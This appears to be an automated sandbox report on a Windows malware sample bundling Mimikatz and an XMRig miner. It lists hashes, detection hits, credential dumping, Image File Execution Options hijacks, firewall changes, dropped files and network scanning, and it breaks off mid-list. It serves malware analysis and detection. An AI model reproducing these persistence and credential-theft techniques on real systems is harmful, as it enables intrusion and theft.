Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-12-2024 08:28
Behavioral task
behavioral1
Sample
2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe
-
Size
9.3MB
-
MD5
6bf69e8a8d9a95d00de131a6831d9a3a
-
SHA1
9c88b368c65b5ee287483c125f6a5d39b5b49d05
-
SHA256
dcd8ddcb8be867bfd5397bb1f4cb9adc51f208fac99b94a2f72f2bf303a621f8
-
SHA512
e28a6a5d2ea77a4536ecc01b1f0fffb8b22edd8a34eab4fa3ad7a897ca2db5b575f2b4f688925be8ef6e819355929e524d452b9a9e7deb51bd095a6644e88e88
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1552 created 1904 1552 kubrser.exe 37 -
Xmrig family
-
Contacts a large (30386) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/3556-177-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp xmrig behavioral2/memory/3556-182-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp xmrig behavioral2/memory/3556-200-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp xmrig behavioral2/memory/3556-212-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp xmrig behavioral2/memory/3556-221-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp xmrig behavioral2/memory/3556-232-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp xmrig behavioral2/memory/3556-247-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp xmrig behavioral2/memory/3556-283-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp xmrig behavioral2/memory/3556-284-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp xmrig behavioral2/memory/3556-296-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp xmrig behavioral2/memory/3556-297-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp xmrig behavioral2/memory/3556-303-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/2972-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2972-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000a000000023b63-6.dat mimikatz behavioral2/memory/1468-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1368-137-0x00007FF78DE40000-0x00007FF78DF2E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts kubrser.exe File opened for modification C:\Windows\system32\drivers\etc\hosts kubrser.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe kubrser.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4304 netsh.exe 1524 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 1468 kubrser.exe 1552 kubrser.exe 3996 wpcap.exe 1096 ebygjlyru.exe 1368 vfshost.exe 4040 xohudmc.exe 4488 mkaliieur.exe 3796 gyggue.exe 3556 kecabt.exe 1580 mkaliieur.exe 3728 mkaliieur.exe 4856 mkaliieur.exe 3532 mkaliieur.exe 2516 mkaliieur.exe 4464 mkaliieur.exe 5064 mkaliieur.exe 2784 mkaliieur.exe 3592 mkaliieur.exe 2604 mkaliieur.exe 4040 mkaliieur.exe 5024 mkaliieur.exe 2684 mkaliieur.exe 4216 mkaliieur.exe 2308 mkaliieur.exe 3028 mkaliieur.exe 3204 kubrser.exe 3332 kltiilukt.exe 5024 kubrser.exe -
Loads dropped DLL 12 IoCs
pid Process 3996 wpcap.exe 3996 wpcap.exe 3996 wpcap.exe 3996 wpcap.exe 3996 wpcap.exe 3996 wpcap.exe 3996 wpcap.exe 3996 wpcap.exe 3996 wpcap.exe 1096 ebygjlyru.exe 1096 ebygjlyru.exe 1096 ebygjlyru.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 68 ifconfig.me 69 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 kubrser.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 kubrser.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 kubrser.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData kubrser.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\gyggue.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft kubrser.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache kubrser.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 kubrser.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE kubrser.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 kubrser.exe File opened for modification C:\Windows\SysWOW64\gyggue.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies kubrser.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content kubrser.exe -
resource yara_rule behavioral2/files/0x0008000000023c06-134.dat upx behavioral2/memory/1368-135-0x00007FF78DE40000-0x00007FF78DF2E000-memory.dmp upx behavioral2/memory/1368-137-0x00007FF78DE40000-0x00007FF78DF2E000-memory.dmp upx behavioral2/files/0x0008000000023c40-144.dat upx behavioral2/memory/4488-145-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/4488-159-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/files/0x0008000000023c24-162.dat upx behavioral2/memory/3556-164-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp upx behavioral2/memory/1580-170-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/3728-174-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/3556-177-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp upx behavioral2/memory/4856-180-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/3556-182-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp upx behavioral2/memory/3532-185-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/2516-189-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/4464-193-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/5064-197-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/3556-200-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp upx behavioral2/memory/2784-202-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/3592-206-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/2604-210-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/3556-212-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp upx behavioral2/memory/4040-215-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/5024-219-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/3556-221-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp upx behavioral2/memory/2684-224-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/4216-228-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/2308-231-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/3556-232-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp upx behavioral2/memory/3028-234-0x00007FF672B20000-0x00007FF672B7B000-memory.dmp upx behavioral2/memory/3556-247-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp upx behavioral2/memory/3556-283-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp upx behavioral2/memory/3556-284-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp upx behavioral2/memory/3556-296-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp upx behavioral2/memory/3556-297-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp upx behavioral2/memory/3556-303-0x00007FF7AF100000-0x00007FF7AF220000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\mikjfkcet\UnattendGC\specials\ssleay32.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\schoedcl.xml kubrser.exe File created C:\Windows\mikjfkcet\jkwhlcpil\wpcap.exe kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\docmicfg.exe kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\AppCapture32.dll kubrser.exe File created C:\Windows\mikjfkcet\jkwhlcpil\scan.bat kubrser.exe File created C:\Windows\mikjfkcet\jkwhlcpil\wpcap.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\coli-0.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\tibe-2.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\Shellcode.ini kubrser.exe File opened for modification C:\Windows\mikjfkcet\jkwhlcpil\Packet.dll kubrser.exe File created C:\Windows\mikjfkcet\jkwhlcpil\kltiilukt.exe kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\exma-1.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\libeay32.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\libxml2.dll kubrser.exe File opened for modification C:\Windows\zbcgklri\spoolsrv.xml kubrser.exe File opened for modification C:\Windows\zbcgklri\kubrser.exe 2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\tucl-1.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\spoolsrv.exe kubrser.exe File created C:\Windows\ime\kubrser.exe kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\svschost.exe kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\schoedcl.exe kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\spoolsrv.xml kubrser.exe File created C:\Windows\mikjfkcet\Corporate\vfshost.exe kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\cnli-1.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\svschost.xml kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\schoedcl.xml kubrser.exe File created C:\Windows\zbcgklri\docmicfg.xml kubrser.exe File opened for modification C:\Windows\zbcgklri\vimpcsvc.xml kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\AppCapture64.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\crli-0.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\trch-1.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\docmicfg.xml kubrser.exe File opened for modification C:\Windows\zbcgklri\docmicfg.xml kubrser.exe File opened for modification C:\Windows\zbcgklri\schoedcl.xml kubrser.exe File created C:\Windows\mikjfkcet\upbdrjv\swrpwe.exe kubrser.exe File opened for modification C:\Windows\zbcgklri\svschost.xml kubrser.exe File created C:\Windows\mikjfkcet\jkwhlcpil\ip.txt kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\ucl.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\spoolsrv.xml kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\docmicfg.xml kubrser.exe File created C:\Windows\zbcgklri\kubrser.exe 2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe File created C:\Windows\mikjfkcet\jkwhlcpil\ebygjlyru.exe kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\vimpcsvc.xml kubrser.exe File created C:\Windows\zbcgklri\vimpcsvc.xml kubrser.exe File created C:\Windows\zbcgklri\schoedcl.xml kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\posh-0.dll kubrser.exe File opened for modification C:\Windows\mikjfkcet\jkwhlcpil\Result.txt kltiilukt.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\vimpcsvc.exe kubrser.exe File created C:\Windows\zbcgklri\svschost.xml kubrser.exe File created C:\Windows\mikjfkcet\Corporate\mimilib.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\svschost.xml kubrser.exe File created C:\Windows\zbcgklri\spoolsrv.xml kubrser.exe File created C:\Windows\mikjfkcet\Corporate\mimidrv.sys kubrser.exe File opened for modification C:\Windows\mikjfkcet\Corporate\log.txt cmd.exe File created C:\Windows\mikjfkcet\jkwhlcpil\Packet.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\trfo-2.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\xdvl-0.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\specials\zlib1.dll kubrser.exe File created C:\Windows\mikjfkcet\UnattendGC\vimpcsvc.xml kubrser.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3272 sc.exe 4528 sc.exe 4624 sc.exe 3316 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kltiilukt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 